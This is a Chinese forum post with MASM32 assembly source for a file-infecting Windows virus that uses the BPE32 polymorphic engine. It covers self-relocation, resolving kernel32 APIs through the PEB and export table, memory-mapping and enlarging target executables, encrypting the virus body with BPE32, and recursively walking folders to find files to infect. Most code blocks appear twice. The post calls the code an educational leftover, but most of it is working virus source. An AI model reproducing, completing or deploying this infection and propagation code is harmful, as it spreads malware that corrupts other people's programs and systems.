[原创]菜鸟用Masm32写的使用 BPE32引擎的感染型病毒

声明：源码只讨论编程技术，想分享给初学者；留在硬盘里难受，技术很老了，过不了杀毒。


首先安装 Masm32 到 C 盘，然后复制文件到 C:\masm32\examples\exampl01\bmbutton 目录下。

1.重定位
2.自获取Api
3.映射内存Map
4.文件最后一个节增大
5.召唤Bpe32引擎
6.遍历目标文件夹
7.修改PE文件信息
1. 多次用到重定位（代码地址会改变）：
  ; Relocation stub: the code runs at an address that differs from its
  ; link-time address, so every data reference below is [ebp + label].
  call func_Reloc                                ; pushes the runtime address of func_Reloc
  func_Reloc:pop ebp                             ; ebp = runtime address of func_Reloc
  mov eax,ebp                                    ; dead: eax is overwritten by the lea below
  sub ebp,  func_Reloc                           ; ebp = runtime address - link-time address = relocation delta
  lea eax,dword ptr ss:[ebp+_LoadLibraryExA_db]; eax = relocated address of the _LoadLibraryExA_db data

2  自获取Api
 ;-----------------------------------------------------------------------
 ; func_Begin - entry of the API-resolution stage.
 ; Walks the PEB to a loaded module's base, resolves the name held in
 ; _LoadLibraryExA_db from that module's export table (func_GetFuncAddr),
 ; stores the result in _LoadLibraryExA_Addr and jumps to func_GetProcessAddr.
 ; Assumes: ebp = relocation delta (see the func_Reloc stub).
 ; Clobbers: eax, ebx, esi, plus everything func_GetFuncAddr clobbers.
 ;-----------------------------------------------------------------------
 func_Begin: 
  mov ebx,dword ptr FS:[30h]                    ; ebx = PEB (TEB+30h)
  mov ebx,dword ptr ds:[ebx+0Ch]                ; ebx = PEB->Ldr
  mov ebx,dword ptr ds:[ebx+1Ch]                ; ebx = Ldr->InInitializationOrderModuleList.Flink (1st entry)
  mov ebx,dword ptr ds:[ebx]                    ; ebx = 2nd entry of that list
  mov ebx,dword ptr ds:[ebx+08h]                ; ebx = that entry's DllBase; the code treats it as kernel32
  mov esi,ebx
  add esi,dword ptr ds:[esi+3Ch]                ; esi = base + e_lfanew (PE header); not used before the call below
  mov dword ptr ss:[ebp+Kernel32Base],ebx       ; Kernel32Base = module base found above (replaced later by LoadLibraryExA)
  lea eax,dword ptr ss:[ebp+_LoadLibraryExA_db] ; eax = relocated address of the export name to look up
  push eax                                      ; arg 2: name
  push dword ptr ss:[ebp+Kernel32Base]          ; arg 1: module base
  call func_GetFuncAddr                         ; eax = address of that export
  mov [_LoadLibraryExA_Addr + ebp],eax          ; NOTE: the two pushed args are removed neither here nor in the callee
  jmp func_GetProcessAddr
  
  ;-----------------------------------------------------------------------
  ; func_GetFuncAddr - export lookup by name (hand-rolled GetProcAddress).
  ; In:    [esp+04h] = module base, [esp+08h] = NUL-terminated export name
  ; Out:   eax = absolute address of the export whose name matches exactly
  ; Stack: returns with a plain retn and leaves both arguments in place
  ;        (the callers in this listing do not remove them either).
  ; Clobbers: eax, ebx, ecx, edx, esi, edi, flags. Relies on DF = 0.
  ; Not-found case: when no name matches, the index equals NumberOfNames
  ; and execution still falls through to the ordinal/address lookup.
  ;-----------------------------------------------------------------------
  func_GetFuncAddr:
  mov esi,dword ptr ss:[esp+04h]                ; esi = module base
  add esi,dword ptr ds:[esi+03Ch]               ; esi = base + e_lfanew = IMAGE_NT_HEADERS
  mov edi,dword ptr ss:[esp+08h]                ; edi = name to find
  
  mov ecx,96h                                   ; scan at most 96h bytes for the terminator
  xor al,al
  repne scas byte ptr es:[edi]                  ; edi ends one past the NUL
  mov ecx,edi
  sub ecx,dword ptr ss:[esp+08h]                ; ecx = strlen(name) + 1 (the NUL takes part in the compare)
  mov edx,dword ptr ds:[esi+78h]                ; export directory RVA (DataDirectory[0])
  add edx,dword ptr ss:[esp+04h]                ; edx = IMAGE_EXPORT_DIRECTORY*
  mov ebx,dword ptr ds:[edx+20h]                ; AddressOfNames RVA
  add ebx,dword ptr ss:[esp+04h]                ; ebx = &AddressOfNames[0]
  xor eax,eax                                   ; eax = name index i = 0
  func_GetLoadLibraryExA_3: mov edi,dword ptr ds:[ebx]    ; RVA of names[i]
  add edi,dword ptr ss:[esp+04h]                ; edi = names[i]
  mov esi,dword ptr ss:[esp+08h]                ; esi = wanted name
  push ecx                                      ; keep the length: repe cmpsb consumes ecx
  repe cmps byte ptr[edi],byte ptr[esi]         ; compare length+1 bytes -> exact match only
  jnz func_GetLoadLibraryExA_1                  ; mismatch: try the next name
  add esp,4h                                    ; match: drop the saved length
  jmp func_GetLoadLibraryExA_2
  func_GetLoadLibraryExA_1:    pop ecx
  add ebx,04h                                   ; next entry of AddressOfNames
  inc eax                                       ; i++
  cmp eax,dword ptr ds:[edx+18h]                ; i == NumberOfNames ?
  jnz func_GetLoadLibraryExA_3
  func_GetLoadLibraryExA_2:  cmp eax,dword ptr ds:[edx+18h]   ; equal means "not found" ...
  jnz func_GetLoadLibraryExA_4                  ; ... but the branch target is the next line, so both cases continue
  ;jmp func_GetLoadLibraryExA_5
  func_GetLoadLibraryExA_4 : mov esi,dword ptr ds:[edx+24h]   ; AddressOfNameOrdinals RVA
  add esi,dword ptr ss:[esp+04h]                ; esi = &AddressOfNameOrdinals[0]
  
 push edx                                       ; mul writes edx: preserve the export-directory pointer
 mov ebx,02h
 xor edx,edx
 mul ebx                                        ; eax = i * sizeof(WORD)
 pop edx
 add eax,esi                                    ; eax = &AddressOfNameOrdinals[i]
 xor ecx,ecx
 mov cx,word ptr ds:[eax]                       ; ecx = ordinal (zero-extended)
 mov edi,dword ptr ds:[edx+1Ch]                 ; AddressOfFunctions RVA
 xor edx,edx
 mov ebx,04h
 mov eax,ecx
 mul ebx                                        ; eax = ordinal * sizeof(DWORD)
 add eax,dword ptr ss:[esp+04h]
 add eax,edi                                    ; eax = &AddressOfFunctions[ordinal]
 mov eax,dword ptr ds:[eax]                     ; function RVA
 add eax,dword ptr ss:[esp+04h]                 ; eax = absolute address
 retn  
 ;-----------------------------------------------------------------------
 ; func_GetProcessAddr - resolve the name in _GetProcAddress_db the same
 ; way, obtain a module handle through the resolved LoadLibraryExA, then
 ; fill the name/address table starting at _CloseHandle_db.
 ; Assumes: ebp = relocation delta, _LoadLibraryExA_Addr already set.
 ; Return values of the API calls are stored without being checked.
 ;-----------------------------------------------------------------------
 func_GetProcessAddr:
 lea eax,dword ptr ss:[ebp+_GetProcAddress_db]  ; eax = export name to look up
 push eax
 push dword ptr ss:[ebp+Kernel32Base]
 call func_GetFuncAddr                          ; both args stay on the stack (see func_GetFuncAddr)
 mov dword ptr [_GetProcAddress_Addr+ebp],eax
 
 lea eax,dword ptr ss:[ebp+_KERNEL32dll_db]     ; eax = library name string
 push 0                                         ; dwFlags = 0
 PUSH 0                                         ; hFile = NULL (reserved)
 push eax                                       ; lpLibFileName
 call dword ptr ss:[ebp+_LoadLibraryExA_Addr]   ; stdcall: callee removes the 3 args
 mov dword ptr ss:[ebp+Kernel32Base],eax        ; overwrite the PEB-derived base with the returned HMODULE
 lea edi,dword ptr ss:[ebp+_CloseHandle_db]     ; edi = first entry of the name/address table
 mov edx,dword ptr ss:[ebp+Kernel32Base]        ; edx = module to resolve from
 call func_GetAllProcAddr
 jmp func_StartUseFunc                          ; continues outside this listing
 ;-----------------------------------------------------------------------
 ; func_GetAllProcAddr - fill an in-place name/address table.
 ; Table layout as read and written here: each entry is a NUL-terminated
 ; name immediately followed by a 4-byte slot that receives the address;
 ; a byte of 0FFh where the next name would start ends the table.
 ; In:  edi = table start (relocated), edx = HMODULE,
 ;      ebp = relocation delta, _GetProcAddress_Addr resolved
 ; Out: every slot = GetProcAddress(edx, name); NULL results are not checked
 ; Clobbers: eax, esi, edi, flags (edx is saved and restored around the call)
 ; The slots are written in place, so the table must live in writable memory.
 ;-----------------------------------------------------------------------
 func_GetAllProcAddr:

 func_GetAllProcAddr2:
 mov esi,edi                                    ; esi = start of this entry's name
 xor al,al
 func_GetAllProcAddr1:
 scas byte ptr es:[edi]                         ; one byte per iteration (no rep); edi ends one past the NUL
 jnz func_GetAllProcAddr1
 push edx                                       ; preserve HMODULE across the call
 push esi                                       ; lpProcName
 push edx                                       ; hModule
 call dword ptr ss:[ebp+_GetProcAddress_Addr]   ; stdcall: callee removes its 2 args
 mov dword ptr ds:[edi],eax                     ; store the address in the slot right after the name
 pop edx
 add edi, 4h                                    ; skip the slot to the next name
 cmp byte ptr ds:[edi], 0FFh                    ; table terminator?
 jnz func_GetAllProcAddr2
 retn
 ; NOTE(review): verbatim repeat of the func_Begin .. func_GetAllProcAddr
 ; listing above (the page rendered the same code box twice).
 ; func_Begin: PEB walk to a module base, then resolve _LoadLibraryExA_db.
 func_Begin: 
  mov ebx,dword ptr FS:[30h]                    ; ebx = PEB
  mov ebx,dword ptr ds:[ebx+0Ch]                ; ebx = PEB->Ldr
  mov ebx,dword ptr ds:[ebx+1Ch]                ; InInitializationOrderModuleList.Flink
  mov ebx,dword ptr ds:[ebx]                    ; 2nd entry
  mov ebx,dword ptr ds:[ebx+08h]                ; entry->DllBase, treated as kernel32
  mov esi,ebx
  add esi,dword ptr ds:[esi+3Ch]                ; esi = PE header (unused before the call)
  mov dword ptr ss:[ebp+Kernel32Base],ebx
  lea eax,dword ptr ss:[ebp+_LoadLibraryExA_db]
  push eax                                      ; arg 2: name
  push dword ptr ss:[ebp+Kernel32Base]          ; arg 1: module base
  call func_GetFuncAddr
  mov [_LoadLibraryExA_Addr + ebp],eax          ; args are left on the stack
  jmp func_GetProcessAddr
  
  ; func_GetFuncAddr: export lookup by exact name.
  ; In [esp+04h] = module base, [esp+08h] = name; out eax = address.
  ; Clobbers eax, ebx, ecx, edx, esi, edi; args are not removed on return.
  func_GetFuncAddr:
  mov esi,dword ptr ss:[esp+04h]
  add esi,dword ptr ds:[esi+03Ch]               ; esi = IMAGE_NT_HEADERS
  mov edi,dword ptr ss:[esp+08h]
  
  mov ecx,96h
  xor al,al
  repne scas byte ptr es:[edi]
  mov ecx,edi
  sub ecx,dword ptr ss:[esp+08h]                ; ecx = strlen(name) + 1
  mov edx,dword ptr ds:[esi+78h]
  add edx,dword ptr ss:[esp+04h]                ; edx = IMAGE_EXPORT_DIRECTORY*
  mov ebx,dword ptr ds:[edx+20h]
  add ebx,dword ptr ss:[esp+04h]                ; ebx = &AddressOfNames[0]
  xor eax,eax                                   ; i = 0
  func_GetLoadLibraryExA_3: mov edi,dword ptr ds:[ebx]
  add edi,dword ptr ss:[esp+04h]                ; edi = names[i]
  mov esi,dword ptr ss:[esp+08h]
  push ecx
  repe cmps byte ptr[edi],byte ptr[esi]         ; exact compare incl. NUL
  jnz func_GetLoadLibraryExA_1
  add esp,4h
  jmp func_GetLoadLibraryExA_2
  func_GetLoadLibraryExA_1:    pop ecx
  add ebx,04h
  inc eax
  cmp eax,dword ptr ds:[edx+18h]                ; NumberOfNames
  jnz func_GetLoadLibraryExA_3
  func_GetLoadLibraryExA_2:  cmp eax,dword ptr ds:[edx+18h]
  jnz func_GetLoadLibraryExA_4                  ; target is the next line: not-found still falls through
  ;jmp func_GetLoadLibraryExA_5
  func_GetLoadLibraryExA_4 : mov esi,dword ptr ds:[edx+24h]   ; AddressOfNameOrdinals
  add esi,dword ptr ss:[esp+04h]
  
 push edx
 mov ebx,02h
 xor edx,edx
 mul ebx                                        ; i * 2
 pop edx
 add eax,esi
 xor ecx,ecx
 mov cx,word ptr ds:[eax]                       ; ordinal
 mov edi,dword ptr ds:[edx+1Ch]                 ; AddressOfFunctions
 xor edx,edx
 mov ebx,04h
 mov eax,ecx
 mul ebx                                        ; ordinal * 4
 add eax,dword ptr ss:[esp+04h]
 add eax,edi
 mov eax,dword ptr ds:[eax]                     ; function RVA
 add eax,dword ptr ss:[esp+04h]                 ; absolute address
 retn  
 ; func_GetProcessAddr: resolve _GetProcAddress_db, LoadLibraryExA(_KERNEL32dll_db, 0, 0),
 ; then fill the table at _CloseHandle_db. Return values are not checked.
 func_GetProcessAddr:
 lea eax,dword ptr ss:[ebp+_GetProcAddress_db]
 push eax
 push dword ptr ss:[ebp+Kernel32Base]
 call func_GetFuncAddr
 mov dword ptr [_GetProcAddress_Addr+ebp],eax
 
 lea eax,dword ptr ss:[ebp+_KERNEL32dll_db]
 push 0                                         ; dwFlags
 PUSH 0                                         ; hFile
 push eax                                       ; lpLibFileName
 call dword ptr ss:[ebp+_LoadLibraryExA_Addr]
 mov dword ptr ss:[ebp+Kernel32Base],eax
 lea edi,dword ptr ss:[ebp+_CloseHandle_db]     ; table start
 mov edx,dword ptr ss:[ebp+Kernel32Base]
 call func_GetAllProcAddr
 jmp func_StartUseFunc                          ; outside this listing
 ; func_GetAllProcAddr: for each "name\0" + 4-byte slot entry (until a 0FFh byte),
 ; slot = GetProcAddress(edx, name). In: edi = table, edx = HMODULE.
 func_GetAllProcAddr:

 func_GetAllProcAddr2:
 mov esi,edi                          
 xor al,al
 func_GetAllProcAddr1:
 scas byte ptr es:[edi]                         ; find the NUL
 jnz func_GetAllProcAddr1
 push edx                                       ; preserve HMODULE
 push esi                                       ; lpProcName
 push edx                                       ; hModule
 call dword ptr ss:[ebp+_GetProcAddress_Addr]
 mov dword ptr ds:[edi],eax                     ; write the slot
 pop edx
 add edi, 4h
 cmp byte ptr ds:[edi], 0FFh                    ; terminator
 jnz func_GetAllProcAddr2
 retn
3.映射内存Map
;-----------------------------------------------------------------------
; func_GetHandle - open the target file read/write and map it into memory.
; In:  ecx = value copied into ebp and then used as the relocation delta
;      (presumably the delta; the caller is not in this listing),
;      hFilePath = path string, the *_Addr slots resolved.
; Out: hFile, hMap, hMapAddr stored ebp-relative. None of the three
;      return values is checked, so INVALID_HANDLE_VALUE / NULL propagate.
; Clobbers: eax, ebp, plus what the stdcall APIs clobber (ecx, edx).
; No retn is visible here; the article continues with the file-growth listing.
;-----------------------------------------------------------------------
; get a file handle
  
  func_GetHandle:

  mov ebp,ecx
  ;mov eax,dword ptr[esp]
 ; mov dword ptr[ReturnAddr+ebp],eax  
  lea eax,dword ptr ds:[ebp+hFilePath]
  push 0                                 ; /hTemplateFile = NULL
  push 80h                                ; |Attributes = FILE_ATTRIBUTE_NORMAL
  push 03h                                 ; |Mode = OPEN_EXISTING
  push 0                                 ; |pSecurity = NULL
  push 03h                                 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
  push 0C0000000h                          ; |Access = GENERIC_READ|GENERIC_WRITE
  push eax                                 ; |FileName = hFilePath
  call dword ptr ss:[ebp+_CreateFileA_Addr]
  mov dword ptr ds:[hFile+ebp],eax         ; unchecked
  
; create the file mapping
  
  push 11800h                             ; /MapName: the constant 11800h, not relocated through ebp and not a string this listing defines - confirm intent
  push  0                                 ; |MaximumSizeLow = 0
  push  0                                 ; |MaximumSizeHigh = 0  (0/0 = current file size)
  push  8000004h                           ; |Protection = PAGE_READWRITE|SEC_COMMIT
  push  0                                 ; |pSecurity = NULL
  push dword ptr ds:[hFile+ebp]             ; |hFile
  call dword ptr ss:[ebp+_CreateFileMappingA_Addr]
  mov dword ptr ds:[hMap+ebp],eax          ; unchecked

; map the view into this process
 
 push 0                                 ; /MapSize = 0 (whole mapping)
 push 0                                 ; |OffsetLow = 0
 push 0                                 ; |OffsetHigh = 0
 push 6                                 ; |AccessMode = FILE_MAP_WRITE|FILE_MAP_READ
 push dword ptr ds:[hMap+ebp]             ; |hMapObject
 call dword ptr ss:[ebp+_MapViewOfFile_Addr]
 mov dword ptr ds:[hMapAddr+ebp],eax      ; unchecked
; NOTE(review): verbatim repeat of the func_GetHandle listing above
; (the page rendered the same code box twice).
; Opens hFilePath read/write, creates a PAGE_READWRITE mapping of the
; current file size and maps a read/write view; results are not checked.
; get a file handle
  
  func_GetHandle:

  mov ebp,ecx                              ; ebp = relocation base (from caller)
  ;mov eax,dword ptr[esp]
 ; mov dword ptr[ReturnAddr+ebp],eax  
  lea eax,dword ptr ds:[ebp+hFilePath]
  push 0                                 ; /hTemplateFile = NULL
  push 80h                                ; |Attributes = FILE_ATTRIBUTE_NORMAL
  push 03h                                 ; |Mode = OPEN_EXISTING
  push 0                                 ; |pSecurity = NULL
  push 03h                                 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
  push 0C0000000h                          ; |Access = GENERIC_READ|GENERIC_WRITE
  push eax                                 ; |FileName = hFilePath
  call dword ptr ss:[ebp+_CreateFileA_Addr]
  mov dword ptr ds:[hFile+ebp],eax
  
; create the file mapping
  
  push 11800h                             ; /MapName = 11800h (absolute constant, not relocated)
  push  0                                 ; |MaximumSizeLow = 0
  push  0                                 ; |MaximumSizeHigh = 0
  push  8000004h                           ; |Protection = PAGE_READWRITE|SEC_COMMIT
  push  0                                 ; |pSecurity = NULL
  push dword ptr ds:[hFile+ebp]             ; |hFile
  call dword ptr ss:[ebp+_CreateFileMappingA_Addr]
  mov dword ptr ds:[hMap+ebp],eax

; map the view into this process
 
 push 0                                 ; /MapSize = 0
 push 0                                 ; |OffsetLow = 0
 push 0                                 ; |OffsetHigh = 0
 push 6                                 ; |AccessMode = FILE_MAP_WRITE|FILE_MAP_READ
 push dword ptr ds:[hMap+ebp]             ; |hMapObject
 call dword ptr ss:[ebp+_MapViewOfFile_Addr]
 mov dword ptr ds:[hMapAddr+ebp],eax

4.文件最后一个节增大
;-----------------------------------------------------------------------
; Grow the opened file by 10000h bytes: read the current size, move the
; file pointer 10000h past the end, then set the end-of-file there.
; In:  ebp = relocation delta, hFile opened with GENERIC_WRITE
; Out: FileSize = size before the growth (low 32 bits only; the
;      0FFFFFFFFh error return of SetFilePointer is not checked)
;-----------------------------------------------------------------------
; get the file size
  push 2                                 ; /Origin = FILE_END
  push 0                                 ; |pOffsetHi = NULL
  push 0                                 ; |OffsetLo = 0
  push dword ptr ds:[hFile+ebp]             ; |hFile
  call dword ptr ss:[ebp+_SetFilePointer_Addr]   ; eax = new position = current size
  mov dword ptr ds:[FileSize+ebp],eax
 ; extend the file
  push 2                                 ; /Origin = FILE_END
  push 0                                 ; |pOffsetHi = NULL
  push 10000h                                 ; |OffsetLo = 10000h (64 KiB past the end)
  push dword ptr ds:[hFile+ebp]             ; |hFile
  call dword ptr ss:[ebp+_SetFilePointer_Addr]
  push dword ptr ds:[hFile+ebp]
  call dword ptr ss:[ebp+_SetEndOfFile_Addr]     ; EOF := current pointer, i.e. the file grows by 10000h bytes
; NOTE(review): verbatim repeat of the file-growth listing above
; (the page rendered the same code box twice).
; get the file size
  push 2                                 ; /Origin = FILE_END
  push 0                                 ; |pOffsetHi = NULL
  push 0                                 ; |OffsetLo = 0
  push dword ptr ds:[hFile+ebp]             ; |hFile
  call dword ptr ss:[ebp+_SetFilePointer_Addr]   ; eax = current size (unchecked)
  mov dword ptr ds:[FileSize+ebp],eax
 ; extend the file
  push 2                                 ; /Origin = FILE_END
  push 0                                 ; |pOffsetHi = NULL
  push 10000h                                 ; |OffsetLo = 10000h
  push dword ptr ds:[hFile+ebp]             ; |hFile
  call dword ptr ss:[ebp+_SetFilePointer_Addr]
  push dword ptr ds:[hFile+ebp]
  call dword ptr ss:[ebp+_SetEndOfFile_Addr]     ; file grows by 10000h bytes
5.召唤Bpe32引擎
  ;-----------------------------------------------------------------------
  ; Hand the body to the BPE32 engine. MASM `invoke` pushes the four
  ; arguments right to left; what each one means is defined by the engine,
  ; which is not part of this listing.
  ; In: ecx and ebx from the caller, ebp = relocation delta,
  ;     lpVirusSrc1 / lplpJumpMain1 variables (ebp-relative)
  ;-----------------------------------------------------------------------
  mov dword ptr[lplpJumpMain1+ebp],ecx           ; save incoming ecx
  mov edx,dword ptr[lpVirusSrc1+ebp] 
  sub ecx,edx
  add ecx,200h                                   ; ecx = (ecx - lpVirusSrc1) + 200h ...
  mov edx,dword ptr[lplpJumpMain1+ebp]           ; edx = the saved ecx
  mov eax,dword ptr[lpVirusSrc1+ebp] 
  mov ecx,2800h                                  ; ... which is discarded: the engine receives the constant 2800h
  mov esi,ebp                                    ; esi = relocation delta (engine contract not visible here - confirm)
  invoke BPE32,eax,ebx,ecx,edx                   ; ebx is not assigned in this fragment; it comes from the caller
  ; NOTE(review): verbatim repeat of the BPE32 invocation listing above
  ; (the page rendered the same code box twice).
  mov dword ptr[lplpJumpMain1+ebp],ecx           ; save incoming ecx
  mov edx,dword ptr[lpVirusSrc1+ebp] 
  sub ecx,edx
  add ecx,200h                                   ; computed length, overwritten below
  mov edx,dword ptr[lplpJumpMain1+ebp]           ; edx = saved ecx
  mov eax,dword ptr[lpVirusSrc1+ebp] 
  mov ecx,2800h                                  ; the engine receives the constant 2800h
  mov esi,ebp
  invoke BPE32,eax,ebx,ecx,edx                   ; ebx comes from the caller
6.遍历目标文件夹
;-----------------------------------------------------------------------
; GetVirPath - recursive directory walk built on FindFirstFileA/FindNextFileA.
; Caller-cleaned 5-argument convention (the recursive call does add esp,014h):
;   [ebp+08h] path        directory to enumerate (C string)
;   [ebp+0Ch] recurse     non-zero: descend into subdirectories
;   [ebp+10h] skipKind    entries whose is-directory flag equals this are not handed to GetVirPath2
;   [ebp+14h] useCallback non-zero: call GetVirPath2 per entry (the original indirect
;                         call through this slot is commented out below)
;   [ebp+18h] arg         forwarded as the 2nd argument of GetVirPath2
; Registers: ebx = ebp as received from the caller; it is the relocation base for
;   the string constants strcat_XieGan "\", strcat_XinHao "*", strcat_YiDian ".",
;   strcat_ErDian ".." and the *_Addr slots, and is pushed/popped around every call.
; Frame (ebp-relative):
;   -04h  SEH trylevel (0, set to -1 on the normal exit)
;   -08h  SEH handler slot: receives eax, which nothing in this listing sets to a handler
;   -0Ch  previous fs:[0]            -14h  strlen(path)
;   -118h search pattern "path\*"    -258h WIN32_FIND_DATAA (attributes at +0, cFileName at +2Ch = -22Ch)
;   -25Ch find handle                -360h full path of the current entry
;   -364h GetVirPath2 result (0 = stop)   -368h is-directory flag   -36Ch 1 once FindNextFileA returns 0
; Stack: 39Ch bytes of locals plus pushes per recursion level.
; Note: strlen(path) runs before path is compared with NULL.
;-----------------------------------------------------------------------
GetVirPath:
push ebp
mov ebx,ebp                           ; ebx = caller's ebp, used as relocation base below
mov ebp,esp
push 0FFFFFFFFh                       ; [ebp-04h] trylevel
push eax                          ; [ebp-08h] SEH handler = eax (not assigned a handler here)
mov eax,dword ptr fs:[0]
push eax                              ; [ebp-0Ch] previous head of the SEH chain
mov dword ptr fs:[0],esp              ; install this record
push ecx
sub esp,039Ch                         ; locals
push ebx
push esi
push edi
mov dword ptr ss:[ebp-010h],esp
mov dword ptr ss:[ebp-04],00
X10040106A :mov eax,dword ptr[ebp+08]
push ebx
push eax                              ; /s = path
call strlen
add esp,04
pop ebx
mov dword ptr ss:[ebp-014h],eax       ; len = strlen(path)
cmp dword ptr ss:[ebp+08],00          ; path == NULL ? (checked after strlen already used it)
je X100401085
cmp dword ptr ss:[ebp-014h],00
jg X10040108A                         ; len > 0
X100401085:                jmp X10040129D   ; nothing to do: leave
X10040108A:  mov ecx,dword ptr ss:[ebp+08]
push ebx
push ecx                              ; /src = path
lea edx,dword ptr ss:[ebp-0118h]      ; |
push edx                              ; |dest = pattern buffer
call strcpy
add esp,8
pop ebx
mov eax,dword ptr ss:[ebp+08]
add eax,dword ptr ss:[ebp-014h]
movsx ecx,byte ptr ds:[eax-01]        ; last character of path
cmp ecx,05Ch                          ; already ends with '\' ?
je X1004010C0
lea edx,dword ptr[strcat_XieGan+ebx]
push ebx
push edx                       ; /src = "\"
lea edx,dword ptr ss:[ebp-0118h]      ; |
push edx                              ; |dest
call strcat
add esp,08
pop ebx
lea eax,dword ptr[strcat_XinHao+ebx]
X1004010C0: push ebx
push eax                       ; /src = "*"
lea eax,dword ptr ss:[ebp-0118h]      ; |

push eax                              ; |dest -> pattern = "path\*"
call strcat
add esp,08
pop ebx
push ebx
lea ecx,dword ptr ss:[ebp-0258h]
push ecx                              ; /pFindFileData
lea edx,dword ptr ss:[ebp-0118h]      ; |
push edx                              ; |FileName = pattern
call dword ptr[_FindFirstFileA_Addr+ebx]; \FindFirstFileA
pop ebx
mov dword ptr ss:[ebp-025Ch],eax      ; find handle
cmp dword ptr ss:[ebp-025Ch],-01      ; INVALID_HANDLE_VALUE ?
jnz X100401109
mov eax,dword ptr ss:[ebp-025Ch]
push ebx
push eax                              ; /hSearch (the invalid handle is still passed to FindClose)
call dword ptr[_FindClose_Addr+ebx]; \FindClose
pop  ebx
jmp X10040129D
X100401109 : mov dword ptr ss:[ebp-0364h],01   ; continue flag = 1
mov dword ptr ss:[ebp-036Ch],0        ; done = 0
X10040111D : cmp dword ptr ss:[ebp-036Ch],00   ; loop head: done ?
jnz X100401281
mov ecx,dword ptr ss:[ebp+08]
push  ebx
push ecx                              ; /src = path
lea edx,dword ptr ss:[ebp-0360h]      ; |
push edx                              ; |dest = full-path buffer
call strcpy
add esp,08
pop ebx
mov eax,dword ptr ss:[ebp+08]
add eax,dword ptr ss:[ebp-014h]
movsx ecx,byte ptr ds:[eax-01]
cmp ecx,05Ch                          ; append '\' unless path already ends with one
je X100401160
lea edx,dword ptr[strcat_XieGan+ebx]
push ebx
push edx                       ; /src = "\"
lea edx,dword ptr ss:[ebp-0360h]      ; |
push edx                              ; |dest
call strcat
add esp,08
pop ebx
X100401160:lea eax,dword ptr ss:[ebp-022Ch]   ; cFileName of the current entry
push ebx
push eax                              ; /src
lea ecx,dword ptr ss:[ebp-0360h]      ; |
push ecx                              ; |dest -> full path = "path\name"
call strcat
add esp,08
pop ebx
mov edx,dword ptr ss:[ebp-0258h]      ; dwFileAttributes
and edx,010h                          ; FILE_ATTRIBUTE_DIRECTORY
neg edx
sbb edx,edx
neg edx                               ; edx = (attributes & 10h) ? 1 : 0
mov dword ptr ss:[ebp-0368h],edx      ; isDir
cmp dword ptr ss:[ebp-0368h],00
je X1004011E8                         ; files go straight to the callback check
lea eax,dword ptr[strcat_YiDian+ebx]
push ebx
push eax                       ; /s2 = "."
lea eax,dword ptr ss:[ebp-022Ch]      ; |
push eax                              ; |s1 = cFileName
call strcmp
add esp,08
pop ebx
test eax,eax
je X1004011C4                         ; "." -> skip to next entry
lea ecx,dword ptr[strcat_ErDian+ebx]
push ebx
push ecx                       ; /s2 = ".."
lea ecx,dword ptr ss:[ebp-022Ch]      ; |
push ecx   
call strcmp
add esp,08
pop ebx
test eax,eax
jnz X1004011E8                        ; any other directory name: process it
X1004011C4: lea edx,dword ptr ss:[ebp-0258h]   ; "." or "..": advance without processing
push ebx
push edx                              ; /pFindFileData
mov eax,dword ptr ss:[ebp-025Ch]      ; |
push eax                              ; |hFile
call dword ptr[_FindNextFileA_Addr+ebx]; \FindNextFileA
pop ebx
neg eax
sbb eax,eax
inc eax                               ; eax = (FindNextFileA == 0) ? 1 : 0
mov dword ptr ss:[ebp-036Ch],eax      ; done flag
jmp X10040111D
X1004011E8   :              cmp dword ptr ss:[ebp+014h],0   ; useCallback ?
je X10040122F
mov ecx,dword ptr ss:[ebp+010h]
cmp ecx,dword ptr ss:[ebp-0368h]      ; skipKind == isDir -> do not call
je X10040122F
mov edx,dword ptr ss:[ebp+018h]
push ebx
push edx                              ; arg 2 = [ebp+18h]
lea eax,dword ptr ss:[ebp-0360h]
push eax                              ; arg 1 = full path
;call dword ptr ss:[ebp+014h]
call GetVirPath2                      ; no add esp,8 follows: balanced only if GetVirPath2 removes its 2 args - confirm

pop ebx
mov dword ptr ss:[ebp-0364h],eax      ; callback result
cmp dword ptr ss:[ebp-0364h],00
jnz X10040122F
mov ecx,dword ptr ss:[ebp-025Ch]      ; result 0: close the search and leave
push ebx
push ecx                              ; /hSearch
call dword ptr[_FindClose_Addr+ebx]; \FindClose
pop ebx
jmp X10040129D
X10040122F :cmp dword ptr ss:[ebp-0368h],00   ; directory ?
je X10040125D
cmp dword ptr ss:[ebp+0Ch],00         ; recurse requested ?
je X10040125D
mov edx,dword ptr ss:[ebp+018h]
push ebx
push edx                              ; arg 5 = [ebp+18h]
mov eax,dword ptr ss:[ebp+014h]
push eax                              ; arg 4 = useCallback
mov ecx,dword ptr ss:[ebp+010h]
push ecx                              ; arg 3 = skipKind
mov edx,dword ptr ss:[ebp+0Ch]
push edx                              ; arg 2 = recurse
lea eax,dword ptr ss:[ebp-0360h]
push eax                              ; arg 1 = subdirectory full path
call GetVirPath                       ; recursion: one more ~39Ch-byte frame per level
add esp,014h
pop ebx
X10040125D   :             lea ecx,dword ptr ss:[ebp-0258h]
push ebx
push ecx                              ; /pFindFileData
mov edx,dword ptr ss:[ebp-025Ch]      ; |
push edx                              ; |hFile
call dword ptr[_FindNextFileA_Addr+ebx]; \FindNextFileA
pop ebx
neg eax
sbb eax,eax
inc eax                               ; eax = (FindNextFileA == 0) ? 1 : 0
mov dword ptr ss:[ebp-036Ch],eax
jmp X10040111D
X100401281: mov eax,dword ptr ss:[ebp-025Ch]   ; enumeration finished
push ebx
push eax                              ; /hSearch
call dword ptr[_FindClose_Addr+ebx]; \FindClose
pop ebx
jmp X100401296
mov eax,X10040129D                    ; unreachable (preceded by an unconditional jmp)
retn
X100401296:  mov dword ptr ss:[ebp-04],-01   ; trylevel = -1
X10040129D :  mov ecx,dword ptr ss:[ebp-0Ch]   ; common exit
mov dword ptr fs:[0],ecx              ; unlink the SEH record
pop edi
pop esi
pop ebx
mov esp,ebp
pop ebp
retn                                  ; eax = whatever the last call left
; NOTE(review): verbatim but truncated repeat of the GetVirPath listing above
; (the page rendered the same code box twice; this copy stops at X100401109,
; before the enumeration loop and the epilogue).
; Args: [ebp+08h] path, [ebp+0Ch] recurse, [ebp+10h] skipKind,
;       [ebp+14h] useCallback, [ebp+18h] callback arg. ebx = caller's ebp (relocation base).
GetVirPath:
push ebp
mov ebx,ebp                           ; ebx = relocation base
mov ebp,esp
push 0FFFFFFFFh                       ; trylevel
push eax                          ; SEH handler slot = eax (not set here)
mov eax,dword ptr fs:[0]
push eax                              ; previous fs:[0]
